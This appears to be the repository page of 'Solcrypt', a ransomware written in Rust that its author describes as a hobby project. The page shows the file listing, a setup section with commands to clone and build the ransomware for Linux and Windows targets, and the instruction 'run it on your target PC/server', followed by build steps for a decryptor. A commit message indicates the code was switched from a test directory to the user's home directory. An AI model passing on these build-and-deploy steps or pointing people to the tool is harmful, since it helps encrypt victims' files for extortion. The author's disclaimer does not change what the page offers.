A high-speed FOSS ransomware written in Rust
Find a file
2024-06-14 17:07:17 +03:00
src feat: use home directory instead of testdir 2024-06-14 16:55:44 +03:00
.gitignore cleanup: move test files to their own directory 2024-06-10 11:02:50 +03:00
Cargo.lock init: add code 2024-06-10 10:57:56 +03:00
Cargo.toml feat: use home directory instead of testdir 2024-06-14 16:55:44 +03:00
LICENSE feat: add license & readme 2024-06-14 17:07:17 +03:00
README.md feat: add license & readme 2024-06-14 17:07:17 +03:00

Solcrypt

A "hobby project" ransomware that isn't really meant to be used for illegal purposes. I made this for fun, ok? Don't get me in legal trouble for it

Setup

Arch

sudo pacman -S rustup
rustup default stable
rustup target add x86_64-pc-windows-msvc # if compiling against windows targets
git clone https://git.xorycode.dev/xory/solcrypt
cd solcrypt 
cargo build --release --bin solcrypt_main # linux targets
cargo build --target x86_64-pc-windows-msvc --bin solcrypt_main --release # windows targets

Then run it on your target PC/server

Decryptor

Assuming you already have the source code cloned Arch

cd solcrypt 
cargo build --release --bin decryptor # linux targets
cargo build --target x86_64-pc-windows-msvc --bin decryptor --release # windows targets